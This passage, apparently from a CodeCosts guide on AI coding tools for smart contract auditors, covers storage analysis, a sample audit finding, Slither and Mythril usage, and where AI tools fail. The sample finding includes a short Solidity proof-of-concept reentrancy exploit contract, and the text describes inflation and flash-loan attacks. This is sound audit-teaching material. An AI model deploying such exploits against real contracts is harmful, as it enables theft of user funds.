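    """sources: {filename: Solidity source}. Returns namespace strings used twice."""
    counts = Counter(ns for src in sources.values() for ns in PATTERN.findall(src))
    return sorted(ns for ns, n in counts.items() if n > 1)

facets = {  # illustrative sources; point this at the real facet files
    "LibVaultStorage.sol": 'bytes32 constant POS = keccak256("diamond.vault.storage");',
    "LibFeeStorage.sol":   'bytes32 constant POS = keccak256("diamond.fee.storage");',
    "LibOtherStorage.sol": 'bytes32 constant POS = keccak256("diamond.vault.storage");',
}
print(namespace_duplicates(facets))  # ['diamond.vault.storage']
```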
Claude Code excels at storage layout analysis. It correctly calculates slot positions for complex inheritance hierarchies, identifies storage collisions between proxy implementation versions, understands the ERC-1967 slot derivation, and can verify diamond storage namespace uniqueness. It generates forge inspect commands and interprets the output. Cursor is useful for tracing storage access across multiple contracts because of its multi-file indexing. Copilot and Windsurf understand basic slot numbering but struggle with mapping/array slot derivation and proxy collision detection. Amazon Q is weak on EVM storage internals. Gemini CLI can explain storage layout concepts but sometimes miscalculates keccak256-based slot positions.
5. Audit Report Generation
An audit finding is only as useful as its documentation. The report must clearly communicate the vulnerability, its severity, the attack scenario, and the recommended fix to developers who may not be security experts. AI tools significantly accelerate report writing — not by finding vulnerabilities (that is the auditor’s job), but by structuring findings into a consistent, clear format and drafting the prose that explains complex attack chains.
Finding classification
The standard severity scale:

- **Critical**: direct loss of funds or permanent protocol bricking with no prerequisites.
- **High**: direct loss of funds with some prerequisites (specific state, timing, or economic conditions).
- **Medium**: indirect loss of funds, griefing, or protocol malfunction under non-trivial conditions.
- **Low**: minor issues, best-practice violations, or edge cases with minimal impact.
- **Informational**: code quality, gas optimizations, and suggestions that do not affect security.
Structured finding template
## [H-01] Cross-function reentrancy in VaultV1 allows borrowing against withdrawn collateral
### Severity
High
### Description
The `withdraw()` function in `VaultV1.sol` sends ETH to the caller via
a low-level `call` before updating the `deposits` mapping (line 42).
An attacker contract can exploit this by implementing a `receive()`
callback that calls `borrow()` during the withdrawal. Because
`deposits[msg.sender]` has not yet been decremented, the collateral
check in `borrow()` (line 58) passes against the stale, pre-withdrawal
balance.
### Impact
An attacker can withdraw their full deposit AND borrow against it in
the same transaction, extracting value equal to their deposit amount
multiplied by the collateral factor. With 10 ETH deposited at a 75%
collateral factor, the attacker extracts 10 ETH + 7.5 ETH worth of
borrowed tokens = 17.5 ETH equivalent value from 10 ETH of capital.
### Proof of Concept
```solidity
contract Exploit {
VaultV1 vault;
bool attacked;
constructor(address _vault) { vault = VaultV1(_vault); }
function attack() external payable {
vault.deposit{value: msg.value}();
vault.withdraw(msg.value);
}
receive() external payable {
if (!attacked) {
attacked = true;
vault.borrow(msg.value * 75 / 100);
}
}
}
```
### Recommended Mitigation
1. Apply the Checks-Effects-Interactions pattern: update
`deposits[msg.sender]` before the external call.
2. Add OpenZeppelin’s `ReentrancyGuard` with `nonReentrant` on ALL
state-modifying functions, not just `withdraw`.
```solidity
function withdraw(uint256 amount) external nonReentrant {
require(deposits[msg.sender] >= amount);
deposits[msg.sender] -= amount; // Effect before interaction
totalDeposits -= amount;
(bool s, ) = msg.sender.call{value: amount}("");
require(s);
}
```
### Location
- `src/VaultV1.sol`, lines 38-48 (`withdraw`)
- `src/VaultV1.sol`, lines 54-63 (`borrow`)
How AI tools help with report generation
Claude Code is the strongest report-writing assistant. Given a vulnerability description and the relevant code, it generates structured findings in the format above with accurate severity classification, clear impact analysis, working proof-of-concept code, and actionable mitigation recommendations. It maintains consistency across multiple findings in a report and can generate the executive summary, scope description, and methodology sections. The key workflow: the auditor identifies the vulnerability and describes it in natural language, then Claude Code drafts the formal finding with code references and PoC.
Cursor is effective for report writing when you have the codebase indexed — you can reference specific files and line numbers in your prompts, and it generates findings with accurate code citations. Gemini CLI produces good prose for report sections when given sufficient context. Copilot, Windsurf, and Amazon Q can generate basic finding templates but lack the domain-specific severity classification and impact analysis that make audit reports useful.
Never submit an AI-generated finding without thorough review. AI tools can misclassify severity (calling a Medium a Critical, or worse, downgrading a Critical to Informational), generate PoC code that does not actually compile or execute the described attack, or miss nuances in the mitigation that introduce new vulnerabilities. The auditor must verify every line of every finding. Use AI to accelerate the writing; use your expertise to ensure the accuracy.
6. Static Analyzer Integration (Slither & Mythril)
Static analyzers are the foundation of every audit workflow. They catch the low-hanging fruit automatically — unchecked return values, missing access control modifiers, reentrancy patterns, uninitialized state variables — freeing the auditor to focus on the logic bugs and economic exploits that require human reasoning. The two primary tools are Slither (Crytic/Trail of Bits, static analysis) and Mythril (ConsenSys, symbolic execution). An effective auditor runs both and understands their complementary strengths.
Slither detector output interpretation
Slither runs fast (seconds) and produces categorized findings. The challenge is not running it — it is interpreting the output. Slither reports many findings, and most codebases produce dozens of informational and low-severity detections that are expected or by-design. The auditor must triage: which findings are real vulnerabilities, which are false positives, and which are code quality issues worth noting in the report?
# Run Slither with all detectors
slither src/VaultV1.sol --print human-summary
# Common output categories:
# HIGH: reentrancy-eth, reentrancy-no-eth, suicidal, unprotected-upgrade
# MEDIUM: reentrancy-benign, reentrancy-events, locked-ether
# LOW: solc-version, naming-convention, missing-zero-check
# INFORMATIONAL: pragma, dead-code, too-many-digits
# Export to JSON for programmatic analysis
slither src/ --json slither-output.json
# Run specific high-value detectors
slither src/ --detect reentrancy-eth,unprotected-upgrade,suicidal,arbitrary-send-eth
# Check ERC-20 conformance with the companion slither-check-erc tool
slither-check-erc src/Token.sol Token
# Generate inheritance graph for audit scoping
slither src/ --print inheritance-graph
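The JSON export is the natural input for a triage script. A sketch, assuming the detector result fields Slither's `--json` output carries (`check`, `impact`, `confidence`; verify against your Slither version). The sample findings below are synthetic:

```python
import json

IMPACT_ORDER = {"High": 0, "Medium": 1, "Low": 2, "Informational": 3, "Optimization": 4}
CONF_ORDER = {"High": 0, "Medium": 1, "Low": 2}

def triage(raw_json):
    """Sort detector findings so the highest-impact items are reviewed first."""
    findings = json.loads(raw_json)["results"]["detectors"]
    findings.sort(key=lambda f: (IMPACT_ORDER.get(f["impact"], 9),
                                 CONF_ORDER.get(f["confidence"], 9)))
    return [(f["impact"], f["confidence"], f["check"]) for f in findings]

sample = json.dumps({"results": {"detectors": [
    {"check": "naming-convention", "impact": "Informational", "confidence": "High"},
    {"check": "reentrancy-eth",    "impact": "High",          "confidence": "Medium"},
    {"check": "reentrancy-benign", "impact": "Low",           "confidence": "Medium"},
]}})
for impact, confidence, check in triage(sample):
    print(impact, confidence, check)
# reentrancy-eth sorts first: that is where manual review starts
```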
Mythril symbolic execution
Mythril uses symbolic execution to explore all reachable states and find concrete inputs that trigger vulnerabilities. It is slower than Slither (minutes to hours) but catches a different class of bugs — arithmetic issues, assertion violations, and state-dependent vulnerabilities that require specific input sequences.
# Run Mythril analysis
myth analyze src/VaultV1.sol --solv 0.8.20
# Increase execution depth for complex contracts
myth analyze src/VaultV1.sol --execution-timeout 900 --max-depth 50
# Analyze deployed contract (mainnet verification)
myth analyze --address 0x1234...abcd --rpc infura
# Common Mythril findings:
# SWC-107: Reentrancy
# SWC-101: Integer overflow/underflow (pre-0.8.0)
# SWC-110: Assert violation (invariant failure)
# SWC-105: Unprotected ether withdrawal
# SWC-112: Delegatecall to untrusted callee
# SWC-115: Authorization through tx.origin
Combining AI tools with static analyzers
The most effective audit workflow uses AI tools to interpret and extend static analyzer output. Run Slither and Mythril first, then use AI to triage and investigate:
Claude Code integrates directly with the terminal workflow. Run slither src/ --json output.json, then ask Claude Code to “analyze this Slither output, identify the real vulnerabilities, explain the false positives, and suggest which findings to investigate manually.” It correctly interprets Slither detector names, understands the SWC classification, and distinguishes between true positives and common false-positive patterns (e.g., reentrancy-benign flagged on a safe callback pattern). It can also suggest additional detectors or Slither printers to run based on the contract type.
Cursor is useful when you have the Slither output and the source code both in the IDE — you can ask it to correlate specific Slither findings with the relevant code and explain whether the finding is exploitable in context. Gemini CLI handles Slither JSON output well when you paste it into the long context window alongside the source code. Copilot, Windsurf, and Amazon Q can explain individual Slither findings but lack the contextual understanding to triage across an entire codebase’s output.
What AI Tools Get Wrong in Smart Contract Auditing
Every auditor using AI tools must understand their systematic failure modes. These are not rare edge cases — they are consistent patterns that appear across every tool we tested. Blindly trusting AI output in an audit context is professional negligence.
- **Missing cross-function reentrancy (only catches single-function):** Every tool flags the classic "external call before state update in the same function" pattern. Most tools miss reentrancy paths that span multiple functions: a callback from `withdraw()` into `borrow()`, or from a token transfer hook into a separate accounting function. Claude Code catches these about 80% of the time; all other tools catch them less than 40% of the time. Read-only reentrancy across contracts is caught by none of the tools reliably.
- **Generating "safe" code that is actually vulnerable:** AI tools frequently generate ERC-20 interactions using `.transfer()` or raw `.transferFrom()` without checking return values. Some tokens (USDT, BNB) do not return `bool` on transfer. Others (USDT) revert on zero-amount transfers. Others (fee-on-transfer tokens) deliver less than the requested amount. The safe pattern is OpenZeppelin's `SafeERC20.safeTransfer()`, but AI tools generate the unsafe version in roughly 60% of cases.
- **Not understanding proxy storage layouts:** AI tools generate upgradeable contract implementations that insert new variables before existing ones, change variable types (e.g., `uint128` to `uint256`), or remove the `__gap` array. Each of these causes storage collision on upgrade. Only Claude Code consistently warns about storage layout preservation when generating V2 implementations.
- **Missing precision loss in division-before-multiplication:** In Solidity, `(a / b) * c` truncates the intermediate result, losing precision. The correct order is `(a * c) / b`. AI tools generate division-before-multiplication in about 30% of share-price calculations, which creates exploitable rounding errors in vault and AMM contracts. The ERC-4626 vault inflation attack is the canonical example: deposit 1 wei, donate a large amount to inflate the share price, then subsequent small deposits round down to zero shares.
- **Generating ERC-20 interactions without safe transfer wrappers:** Related to the second point, but broader: AI tools do not account for the full spectrum of ERC-20 non-compliance. Rebasing tokens (stETH), fee-on-transfer tokens (STA, PAXG), tokens with blacklists (USDC, USDT), tokens that block transfers to certain addresses, and tokens with permit functions that differ from EIP-2612. An auditor must verify that the protocol handles all token behaviors it claims to support.
- **Not considering protocol composability:** When asked to review a lending protocol, AI tools analyze the contract in isolation. They do not consider that an attacker can use an Aave flash loan to manipulate a Uniswap pool price, which feeds into a Chainlink oracle, which affects the lending protocol's collateral valuation, which enables a profitable liquidation cascade. These multi-protocol attack chains are exactly what human auditors find, and no AI tool reliably reasons about them without explicit prompting.
- **Suggesting OpenZeppelin patterns without version-specific context:** OpenZeppelin's API changes between major versions. `_setupRole` was deprecated in favor of `_grantRole` and removed in v5. `Counters.sol` was removed entirely in v5. `ERC20Burnable` changed its inheritance requirements. AI tools frequently generate code using deprecated or removed functions from the wrong OpenZeppelin version, creating compilation errors or, worse, subtly different security properties.
- **Missing gas griefing and denial-of-service vectors:** AI tools rarely flag unbounded loops over dynamic arrays (gas limit DoS), external calls in loops that can be griefed by a reverting receiver, `block.timestamp` manipulation within the 12-second tolerance, returndata bombs (a malicious contract that returns megabytes of data to consume the caller's gas), or push-over-pull payment patterns that let one failed transfer block all other recipients.
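Two of the failure modes above, division-before-multiplication and the ERC-4626 inflation attack, reduce to a few lines of integer arithmetic. Python's floor division matches Solidity's truncation for non-negative values; the numbers are illustrative:

```python
# Division before multiplication truncates the intermediate result.
a, b, c = 10, 3, 7
print((a // b) * c)  # 21: a/b truncated to 3 before scaling
print((a * c) // b)  # 23: multiply first, divide once at the end

# The ERC-4626 inflation attack is the same rounding, weaponized.
total_shares, total_assets = 1, 1    # attacker's 1-wei deposit mints 1 share
total_assets += 10_000 * 10**18      # attacker donates to inflate share price
victim_deposit = 5_000 * 10**18
victim_shares = victim_deposit * total_shares // total_assets
print(victim_shares)                 # 0: the victim's deposit mints zero shares
```

The donated assets, plus the victim's deposit, are then redeemable by the attacker's single share, which is why modern ERC-4626 implementations use virtual shares or dead-share minting.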
AI tools are trained on code that was written, not on exploits that were executed. They understand patterns — “this looks like reentrancy” — but they do not reason about economic incentives, MEV, flash loan capital efficiency, or the game-theoretic behavior of rational adversaries. The most valuable bugs in an audit are the ones that require understanding why someone would exploit a contract, not just how. No AI tool replaces the auditor’s adversarial mindset.
Cost Model for Smart Contract Auditors
Smart contract auditors range from solo independents working contest platforms (Code4rena, Sherlock, Hats Finance) to established firms with enterprise tooling. Here is how AI tool costs scale across the spectrum:
| Profile | Stack | Monthly Cost | Best For |
|---|---|---|---|
| Solo contest auditor | Copilot Free + Slither + Mythril + Foundry | $0 | Beginners on Code4rena/Sherlock — all essential tools are free, Copilot covers test scaffolding |
| Independent auditor | Claude Code + Slither + Mythril + Foundry | $20 | Full-time independent auditors — Claude Code for deep reasoning, vulnerability detection, report drafting |
| Professional auditor | Claude Code + Copilot Pro + Foundry + Slither | $30 | Experienced auditors wanting both deep reasoning (Claude) and fast completions (Copilot) for PoC writing |
| Audit team member | Cursor Pro + Claude Code + Foundry + Certora | $40 | Team auditors who need multi-file IDE context (Cursor) plus terminal-based deep analysis (Claude Code) |
| Audit firm (per seat) | Cursor Business + Claude Code Team + Certora + Slither + custom tooling | $60–$99 | Firms (OpenZeppelin, Trail of Bits, Spearbit) needing team management, SSO, audit trail, IP protection |
The economics: A solo auditor on Code4rena earns $0–$50K per contest, with top auditors consistently in the $10K–$50K range per engagement. A $20/mo Claude Code subscription pays for itself if it helps you find one additional Medium-severity finding per contest. At the firm level, audit engagements range from $50K to $500K+, and tool costs at $99/seat are negligible relative to auditor salaries ($200K–$500K for experienced smart contract auditors). The ROI question is not “can we afford the tools” but “do the tools help us find more bugs in less time” — and for vulnerability pattern detection and report generation, the answer is unambiguously yes.
The Bottom Line
Smart contract auditing is the highest-stakes application of AI coding tools. The margin for error is zero — a missed vulnerability means real money lost, permanently, on an immutable blockchain. AI tools are force multipliers for experienced auditors, not replacements for audit expertise. They accelerate the work you already know how to do: triaging static analyzer output, writing invariant tests, drafting structured findings, and reasoning about complex interaction patterns. They do not replace the adversarial mindset, the economic reasoning, or the protocol-specific domain knowledge that separates a good auditor from an automated scanner.
The most effective setup for most auditors is Claude Code ($20/mo) plus the free open-source stack (Slither, Mythril, Foundry, Halmos) = $20/mo total. Claude Code handles the reasoning-heavy work: analyzing cross-function reentrancy paths, interpreting static analyzer output in context, generating Certora specs and Foundry invariant tests, and drafting audit reports. If you want inline completions for faster PoC writing and test scaffolding, add Copilot Pro ($10/mo) = $30/mo. If you audit large protocols with many contracts, add Cursor Pro ($20/mo) for its multi-file context = $40/mo.
The one thing AI tools cannot do is think like an attacker. They pattern-match against known vulnerability classes. They do not ask “what would I do with $100 million in flash loan capital and knowledge of every protocol this contract interacts with?” That question — the question that finds the $50 million bug — remains the auditor’s job. Use AI tools to handle the mechanics so you can spend more time on the reasoning. That is where the real value is.
Compare all tools and pricing on the CodeCosts homepage. If you build smart contracts rather than audit them, see the Blockchain & Web3 Developers guide. For general security engineering tooling, check the Security Engineers guide. For cryptographic implementation review, see the Cryptography Engineers guide.
Related on CodeCosts
- AI Coding Tools for Blockchain & Web3 Developers (2026) — Solidity, Rust/Solana, Foundry, gas optimization, DeFi development
- AI Coding Tools for Security Engineers (2026) — pentesting, SIEM, IaC scanning, vulnerability research
- AI Coding Tools for Cryptography Engineers (2026) — AES-GCM, elliptic curves, TLS, side-channel mitigation